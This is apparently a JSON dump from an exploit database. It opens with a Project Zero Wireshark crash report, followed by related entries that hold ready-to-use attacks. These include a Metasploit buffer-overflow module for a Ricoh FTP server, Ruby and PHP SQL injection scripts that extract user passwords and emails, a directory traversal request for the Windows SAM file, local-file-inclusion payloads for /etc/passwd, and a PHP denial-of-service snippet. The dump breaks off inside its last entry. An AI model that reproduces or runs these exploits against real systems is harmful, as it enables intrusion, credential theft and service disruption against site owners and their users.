{"sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0\r\nREAD of size 16385 at 0x61b00001335c thread T0\r\n #0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438\r\n #1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)\r\n #2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32\r\n #3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21\r\n #4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13\r\n #5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21\r\n #6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9\r\n #7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10\r\n #8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #12 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3\r\n #17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #18 0x52eebb in process_packet wireshark/tshark.c:3748:5\r\n #19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11\r\n #20 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x5244dd in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51decd in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==8910==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip\n\n# 0day.today [2018-04-13] #", "history": [], "description": "Exploit for multiple platform in category dos / poc", "sourceHref": "https://0day.today/exploit/26008", "reporter": "Google Security Research", "href": "https://0day.today/exploit/description/26008", "type": "zdt", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "cdc2aa401057df1e80c0829fd5fd09a7"}, {"key": "href", "hash": "a8a015bd6106138e733d10c90da401cc"}, {"key": "modified", "hash": "d4d064cfe0e4042b38911306aeefc42e"}, {"key": "published", "hash": "d4d064cfe0e4042b38911306aeefc42e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "81a8aed471c1b3b06ec573646a85f0f9"}, {"key": "sourceData", "hash": "d8a71c7972bf6f44e76d81eab4136574"}, {"key": "sourceHref", "hash": "f5e40f47bad6840f4dc8fa136a961873"}, {"key": "title", "hash": "4cd01baa98fff5a152e283cf643657ce"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "viewCount": 5, "references": [], "lastseen": "2018-04-13T07:50:41", "published": "2016-05-13T00:00:00", "objectVersion": "1.3", "cvelist": [], "id": "1337DAY-ID-26008", "hash": "ceded8df522e7fe00786c889c197c59e0c86e1be00e07e061c23872c833b04fc", "modified": "2016-05-13T00:00:00", "title": "Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-18426", "1337DAY-ID-17818", "1337DAY-ID-16385", "1337DAY-ID-12175", "1337DAY-ID-4215", "1337DAY-ID-3748", "1337DAY-ID-3504", "1337DAY-ID-2687", "1337DAY-ID-2213", "1337DAY-ID-2204"]}], "modified": "2018-04-13T07:50:41"}, "vulnersScore": 5.0}}

{"zdt": [{"lastseen": "2018-01-10T09:17:37", "bulletinFamily": "exploit", "description": "Exploit for php platform in category dos / poc", "modified": "2012-06-03T00:00:00", "published": "2012-06-03T00:00:00", "id": "1337DAY-ID-18426", "href": "https://0day.today/exploit/description/18426", "type": "zdt", "title": "PHP 5.3.10 spl_autoload_register() Local Denial of Service", "sourceData": "<?php\r\n#####################################################################\r\n## PHP 5.3.10 spl_autoload_register() Local Denial of Service\r\n## Tested on Windows 7 64bit, English, Apache, PHP 5.3.10\r\n## Date: 02/06/2012\r\n## Local Denial of Service\r\n## Bug discovered by Pr0T3cT10n, <[email\u00a0protected]>\r\n## ISRAEL\r\n## http://www.0x31337.net\r\n#####################################################################\r\n \r\n$buffer = str_repeat(\"A\",9999);\r\nspl_autoload_register($buffer);\r\n \r\n## Or..\r\n# spl_autoload_register($buffer,1,1); #Should work too.\r\n?>\r\n\r\n\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18426"}, {"lastseen": "2018-01-01T07:16:57", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2012-03-24T00:00:00", "published": "2012-03-24T00:00:00", "id": "1337DAY-ID-17818", "href": "https://0day.today/exploit/description/17818", "type": "zdt", "title": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::Ftp\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\r\n service. By supplying a long string of data to the USER command, it is\r\n possible to trigger a stack-based buffer overflow, which allows remote code\r\n execution under the context of the user.\r\n \r\n Please note that in order to trigger the vulnerability, the server must\r\n be configured with a log file name (by default, it's disabled).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Julien Ahrens', #Discovery, PoC\r\n 'sinn3r' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['OSVDB', '79691'],\r\n ['URL', 'http://secunia.com/advisories/47912'],\r\n ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']\r\n ],\r\n 'Payload' =>\r\n {\r\n # Yup, no badchars\r\n 'BadChars' => \"\\x00\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Windows XP SP3',\r\n {\r\n 'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)\r\n 'Offset' => 245\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 1 2012\",\r\n 'DefaultTarget' => 0))\r\n \r\n # We're triggering the bug via the USER command, no point to have user/pass\r\n # as configurable options.\r\n deregister_options('FTPPASS', 'FTPUSER')\r\n end\r\n \r\n def check\r\n connect\r\n disconnect\r\n if banner =~ /220 DSC ftpd 1\\.0 FTP Server/\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(target['Offset'], payload_badchars)\r\n buf << [target.ret].pack('V')\r\n buf << make_nops(20)\r\n buf << payload.encoded\r\n \r\n print_status(\"#{rhost}:#{rport} - Sending #{self.name}\")\r\n connect\r\n send_user(buf)\r\n handler\r\n disconnect\r\n end\r\nend\r\n \r\n=begin\r\n0:002> lmv m SR10\r\nstart end module name\r\n00400000 00410000 SR10 (deferred) \r\n Image path: C:\\Program Files\\DC Software\\SR10.exe\r\n Image name: SR10.exe\r\n Timestamp: Mon May 19 23:55:32 2008 (483275E4)\r\n CheckSum: 00000000\r\n ImageSize: 00010000\r\n File version: 1.0.0.520\r\n Product version: 1.0.0.0\r\n File flags: 0 (Mask 3F)\r\n File OS: 4 Unknown Win32\r\n File type: 1.0 App\r\n File date: 00000000.00000000\r\n Translations: 0409.04b0\r\n CompanyName: Ricoh Co.,Ltd.\r\n ProductName: SR-10\r\n InternalName: SR-10\r\n OriginalFilename: SR10.EXE\r\n ProductVersion: 1, 0, 0, 0\r\n FileVersion: 1, 0, 0, 520\r\n PrivateBuild: 1, 0, 0, 520\r\n SpecialBuild: 1, 0, 0, 520\r\n FileDescription: SR-10\r\n \r\n \r\nNote: No other DC Software dlls are loaded when SR-10.exe is running, so the most\r\nstable component we can use is msvcrt.dll for now.\r\n=end\r\n\r\n\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17818"}, {"lastseen": "2018-03-13T14:10:42", "bulletinFamily": "exploit", "description": "Exploit for jsp platform in category web applications", "modified": "2011-06-23T00:00:00", "published": "2011-06-23T00:00:00", "id": "1337DAY-ID-16385", "href": "https://0day.today/exploit/description/16385", "type": "zdt", "title": "ManageEngine Service Desk Plus 8.0 Directory Traversal Vulnerability", "sourceData": "Google Dork: ie: intitle:ManageEngine ServiceDesk Plus\"\r\nAuthor: Keith Lee [email\u00a0protected]\r\nSoftware Link: http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe\r\nVersion: 8.0\r\n \r\nDescription:\r\n \r\nDirectory traversal vulnerabilities has been found in ManageEngine\r\nServiceDesk Plus 8.0 a web\r\nbased helpdesk system written in Java.\r\n \r\nThe vulnerability can be exploited to access local files by entering\r\nspecial characters in variables used to create file paths. The attackers\r\nuse \u00ef\u00bf\u00bd../\u00ef\u00bf\u00bd sequences to move up to root directory, thus permitting\r\nnavigation through the file system.\r\n \r\nRequest:\r\nGET http://[webserver\r\nIP]:8080/workorder/FileDownload.jsp?module=agent&&FILENAME=%20..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\repair\\SAM\r\n \r\nThe issue is fixed with Service Pack Build 8012 found in the below link.\r\nhttp://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus_8_0_0_SP-0_12_0.ppm\r\n\r\n\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16385"}, {"lastseen": "2018-04-14T03:49:37", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-05-09T00:00:00", "published": "2010-05-09T00:00:00", "id": "1337DAY-ID-12175", "href": "https://0day.today/exploit/description/12175", "type": "zdt", "title": "phpscripte24 Shop System SQL Injection Vulnerability Exploit", "sourceData": "============================================================\r\nphpscripte24 Shop System SQL Injection Vulnerability Exploit\r\n============================================================\r\n\r\n----------------------------Information------------------------------------------------\r\n+Name : phpscripte24 Shop System SQL Injection Vulnerability Exploit\r\n+Autor : Easy Laster\r\n+ICQ : 11-051-551\r\n+Date : 09.05.2010\r\n+Script : phpscripte24 Shop System\r\n+Price : 69.99 ?\r\n+Language :PHP\r\n+Discovered by Easy Laster 4004-security-project.com\r\n+Security Group Undergroundagents and 4004-Security-Project 4004-security-project.com\r\n+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,\r\nKiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,\r\nN00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox.\r\n \r\n---------------------------------------------------------------------------------------\r\n \r\n ___ ___ ___ ___ _ _ _____ _ _\r\n| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_\r\n|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|\r\n |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|\r\n |___| |___| \r\n \r\n \r\n----------------------------------------------------------------------------------------\r\n+Vulnerability : www.site.com/shop/index.php?site=content&id=\r\n----------------------------------------------------------------------------------------\r\n#!/usr/bin/ruby\r\n#4004-security-project.com\r\n#Discovered and vulnerability by Easy Laster\r\nrequire 'net/http'\r\nprint \"\r\n#########################################################\r\n# 4004-Security-Project.com #\r\n#########################################################\r\n# phpscripte24 Shop System SQL Injection Vulnerability #\r\n# Exploit #\r\n# Using Host+Path+userid+prefix #\r\n# demo.com /shop/ 1 user #\r\n# Easy Laster #\r\n#########################################################\r\n\"\r\nblock = \"#########################################################\"\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter host name (site.com)->\"\r\nhost=gets.chomp\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter script path (/forum/)->\"\r\npath=gets.chomp\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter userid (userid)->\"\r\nuserid=gets.chomp\r\nprint \"\"+ block +\"\"\r\nprint \"\\nEnter prefix (prefix z.b user)->\"\r\nprefix=gets.chomp\r\nprint \"\"+ block +\"\"\r\nbegin\r\ndir = \"index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/\"+ prefix +\"/**/WHERE/**/id=\"+ userid +\"\"\r\nhttp = Net::HTTP.new(host, 80)\r\nresp= http.get(path+dir)\r\nprint \"\\nThe ID is -> \"+(/#####(.+)#####/).match(resp.body)[1]\r\ndir = \"index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,passwort,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/\"+ prefix +\"/**/WHERE/**/id=\"+ userid +\"\"\r\nhttp = Net::HTTP.new(host, 80)\r\nresp= http.get(path+dir)\r\nprint \"\\nThe Password is -> \"+(/#####(.+)#####/).match(resp.body)[1]\r\ndir = \"index.php?site=content&id=99999999999/**/UNION/**/SELECT/**/1,2,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23)/**/FROM/**/\"+ prefix +\"/**/WHERE/**/id=\"+ userid +\"\"\r\nhttp = Net::HTTP.new(host, 80)\r\nresp= http.get(path+dir)\r\nprint \"\\nThe Email is -> \"+(/#####(.+)#####/).match(resp.body)[1]\r\nrescue\r\nprint \"\\nExploit failed\"\r\nend\r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12175"}, {"lastseen": "2018-01-01T23:01:28", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-11-20T00:00:00", "published": "2008-11-20T00:00:00", "id": "1337DAY-ID-4215", "href": "https://0day.today/exploit/description/4215", "type": "zdt", "title": "PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit", "sourceData": "=============================================================\r\nPHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\r\n=============================================================\r\n\r\n\r\n<?php\r\n/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\r\n PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\r\n requires magic_quotes == off\r\n\r\n coded by irk4z\r\n homepage: http://irk4z.wordpress.com\r\n\r\n greets: all friends ;)\r\n*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/\r\n\r\n$host = $argv[1];\r\n$path = $argv[2];\r\n$login = $argv[3];\r\n$pass = $argv[4];\r\n$sql_injection = $argv[5];\r\n\r\necho\r\n\"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\\n\".\r\n\" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\\n\".\r\n\" requires magic_quotes == off\\n\".\r\n\"\\n\".\r\n\" coded by irk4z[at]yahoo.pl\\n\".\r\n\" homepage: http://irk4z.wordpress.com\\n\".\r\n\"\\n\".\r\n\" greets: all friends ;)\\n\".\r\n\"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\\n\";\r\n\r\nif(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){\r\n\techo \"Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\\n\" .\r\n\t\t \" php $argv[0] localhost /php-fusion/ user s3cret \\\"SELECT database()\\\"\\n\".\r\n\t\t \" php $argv[0] localhost / user s3cret \\\"SELECT load_file(0x2F6574632F706173737764)\\\"\\n\\n\";\r\n\tdie;\r\n}\r\n\r\necho \"Logging into system...\";\r\n//login to php-fusion using login and pass\r\n$login_data = send($host, array(\t\"path\" => $path.\"news.php\",\r\n\t\t\t\t\t\"post\" => array(\r\n\t\t\t\t\t\t\t\"user_name\" => $login,\r\n\t\t\t\t\t\t\t\"user_pass\" => $pass,\r\n\t\t\t\t\t\t\t\"login\" => \"Login\"\r\n\t\t\t\t\t\t\t)\r\n\t\t\t\t)\r\n\t\t\t);\r\n\r\n//get cookies\r\npreg_match_all(\"/Set-Cookie:[\\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\\.]+;)/\", $login_data, $matches);\r\n$cookies = implode(' ', $matches[1]);\r\n\r\n//get user id\r\npreg_match_all(\"/([0-9])+.([a-zA-Z0-9]{32})/\", $cookies, $matches);\r\n$my_id = $matches[1][0];\r\n\r\nif(empty($my_id)){\r\n\techo \"\\n[x] Incorrect login or password..\";\r\n\tdie;\r\n} else {\r\n\techo \"[ok]\\n\";\r\n}\r\n\r\n$id_message = uniqid();\r\n$inhex = '';\r\nfor($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;\r\n\r\necho \"Running sql-injection...\\n\";\r\n//running sql-injection\r\n$res = send($host, array(\t\"path\" => $path.\"messages.php?msg_send={$my_id}%27%2F%2Axxx&\",\r\n\t\t\t\t\"cookie\" => $cookies,\r\n\t\t\t\t\"post\" => array(\r\n\t\t\t\t\t\t\"send_message\" => 'X',\r\n\t\t\t\t\t\t\"subject\" => \"X*/,0x{$inhex},\t\t\t\t\t\t\t\t(SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*\",\r\n\t\t\t\t\t\t\"message\" => \"XXX\"\r\n\t\t\t\t\t\t)\r\n\t\t\t)\r\n\t\t);\r\n\r\necho \"Getting data...\\n\\n\";\r\n$res = send($host, array(\t\"path\" => $path.\"messages.php?folder=outbox\",\r\n\t\t\t\t\"cookie\" => $cookies )\r\n\t\t\t);\r\n\r\npreg_match_all(\"/msg_read=([0-9]+)'>{$id_message}<\\/a>/\", $res, $matches);\r\n$id_message_number = $matches[1][0];\r\n\r\n$res = send($host, array(\t\"path\" => $path.\"messages.php?folder=outbox&msg_read=\".$id_message_number,\r\n\t\t\t\t\"cookie\" => $cookies )\r\n\t\t);\r\n\r\npreg_match_all(\"/{$id_message}{$id_message}(.*){$id_message}{$id_message}/\", $res, $matches);\r\n\r\nif( empty($matches[1][0]) ){\r\n\techo \"[x] Failed... maybe SQL-INJ is incorrect?\\n\\n\";\r\n} else {\r\n\t$tmp = '';\r\n\t$hex = $matches[1][0];\r\n\t//unhex it!\r\n\tfor($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));\r\n\techo \"DATA: \\n\".$tmp.\"\\n\\n\";\r\n}\r\n\r\necho \"Deleting message...\\n\";\r\n\r\n$res = send($host, array(\t\"path\" => $path.\"messages.php?folder=outbox&msg_id=\".$id_message_number,\r\n\t\t\t\t\"cookie\" => $cookies,\r\n\t\t\t\t\"post\" => array (\r\n\t\t\t\t\t\t\"delete\" => \"Delete\"\r\n\t\t\t\t\t\t)\r\n\t\t\t)\r\n\t\t);\r\n\r\n//send http packet\r\nfunction send($host, $dane = \"\") {\r\n\t$packet = (empty($dane['post']) ? \"GET\" : \"POST\") . \" {$dane[\"path\"]} HTTP/1.1\\r\\n\";\r\n\t$packet .= \"Host: {$host}\\r\\n\";\r\n\t\r\n\tif( !empty($dane['cookie']) ){\r\n\t\t$packet .= \"Cookie: {$dane['cookie']}\\r\\n\";\r\n\t}\r\n\t\r\n\tif( !empty($dane['post']) ){\r\n\t\t$reszta_syfu = \"\";\r\n\t\tforeach($dane['post'] as $tmp => $tmp2){\r\n\t\t\t$reszta_syfu .= $tmp . \"=\" . $tmp2 . \"&\";\r\n\t\t}\r\n\t\t$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n\t\t$packet .= \"Connection: Close\\r\\n\";\r\n\t\t$packet .= \"Content-Length: \".strlen($reszta_syfu).\"\\r\\n\\r\\n\";\r\n\t\t$packet .= $reszta_syfu;\r\n\t} else {\r\n\t\t$packet .= \"Connection: Close\\r\\n\\r\\n\";\r\n\t}\r\n\r\n\t$o = @fsockopen($host, 80);\r\n\tif(!$o){\r\n\t\techo \"\\n[x] No response...\\n\";\r\n\t\tdie;\r\n\t}\r\n\tfputs($o, $packet);\r\n\twhile (!feof($o)) $ret .= fread($o, 1024);\r\n\tfclose($o);\r\n\treturn ($ret);\r\n}\r\n\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4215"}, {"lastseen": "2018-03-10T00:10:32", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-09-24T00:00:00", "published": "2008-09-24T00:00:00", "id": "1337DAY-ID-3748", "href": "https://0day.today/exploit/description/3748", "type": "zdt", "title": "barcodegen <= 2.0.0 Local File Inclusion Vulnerability", "sourceData": "======================================================\r\nbarcodegen <= 2.0.0 Local File Inclusion Vulnerability\r\n======================================================\r\n\r\n\r\n\r\n :::::::-. ... ::::::. :::.\r\n ;;, `';, ;; ;;;`;;;;, `;;;\r\n `[[ [[[[' [[[ [[[[[. '[[\r\n $$, $$$$ $$$ $$$ \"Y$c$$\r\n 888_,o8P'88 .d888 888 Y88\r\n MMMMP\"` \"YmmMMMM\"\" MMM YM\r\n\r\n [ Discovered by dun ]\r\n\r\n ###################################################################\r\n # [ barcodegen <= 2.0.0 ] Local File Inclusion Vulnerability #\r\n ###################################################################\r\n #\r\n # Script: \"Barcode Generator 1D\"\r\n #\r\n # Script site: http://www.barcodephp.com/\r\n # Download: http://www.barcodephp.com/download.php\r\n #\r\n # Vuln: \r\n # http://site.com/[barcodegen.1d-v2.0.0]/html/image.php?t=1&r=1&text=1&f1=1&f2=1&o=1&a1=1&a2=1&code=/../../../../../../../etc/passwd%00\r\n # \r\n #\r\n # Bug: ./barcodegen.1d-v2.0.0/html/image.php (lines: 2-8)\r\n #\r\n # ...\r\n # if(isset($_GET['code']) && isset($_GET['t']) && isset($_GET['r']) && isset($_GET['text']) && isset($_GET['f1']) \r\n # && isset($_GET['f2']) && isset($_GET['o']) && isset($_GET['a1']) && isset($_GET['a2'])) {\r\n #\trequire('config.php');\r\n #\trequire($class_dir.'/BCGColor.php');\r\n #\trequire($class_dir.'/BCGBarcode.php');\r\n #\trequire($class_dir.'/BCGDrawing.php');\r\n #\trequire($class_dir.'/BCGFont.php');\r\n #\tif(include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')) {\t// LFI\r\n # ... \t\t\t \r\n #\r\n #\r\n ###############################################\r\n # Greetz: D3m0n_DE * str0ke * and otherz..\r\n ###############################################\r\n\r\n [ dun / 2008 ] \r\n\r\n*******************************************************************************************\r\n\r\n\r\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/3748"}, {"lastseen": "2018-03-20T11:30:14", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-08-04T00:00:00", "published": "2008-08-04T00:00:00", "id": "1337DAY-ID-3504", "href": "https://0day.today/exploit/description/3504", "type": "zdt", "title": "Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities", "sourceData": "===========================================================\r\nDayfox Blog 4 Multiple Local File Inclusion Vulnerabilities\r\n===========================================================\r\n\r\n\r\n\r\n--------\r\nDiscoverd By :Virangar Security Team (hadihadi)\r\n\r\nspecial tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra\r\n\r\n& all virangar members & all iranian hackerz\r\n\r\ngreetz:to my best friend in the world hadi_aryaie2004\r\n& my lovely friend arash(imm02tal) from ISCN\r\n-----------------------------------\r\nDownload: http://www.dayfoxdesigns.co.nr\r\nDork:Powered by Dayfox Designs This is a port of WordPress \r\n-------------------------------------------------------------------------------------------------\r\nvuln codes in index.php:\r\n############line 140-144##################\r\nif (isset($_GET[\"cat\"])) {\r\n $page = 'entries/'.strip_tags(htmlspecialchars($_GET[\"cat\"])).'.txt';\r\n if (file_exists($page)) {\r\n echo \"<br /><a href=\\\"javascript: history.go(-1)\\\">< Back</a>\";\r\n @include (\"$page\");\r\n############line 173-178###################\r\nif (isset($_GET[\"p\"])) {\r\n $page = 'entries/'.strip_tags(htmlspecialchars($_GET[\"p\"])).'.txt';\r\n $pagecomments = 'entries/'.strip_tags(htmlspecialchars($_GET[\"p\"])).'comments.txt';\r\n if (file_exists($page)) {\r\n echo '<br /><a href=\"javascript: history.go(-1)\">< Back</a>';\r\n include (\"$page\");\r\n############line 209-213##################\r\nif (isset($_GET[\"archive\"])) {\r\n $page = 'entries/'.strip_tags(htmlspecialchars($_GET[\"archive\"])).'.txt';\r\n if (file_exists($page)) {\r\n echo '<br /><a href=\"javascript: history.go(-1)\">< Back</a>';\r\n include (\"$page\");\r\n----------------------------------------------------------------------------------------------------\r\n\r\nexploit:\r\nhttp://site.com/index.php?p=../../../../../../../etc/passwd%00 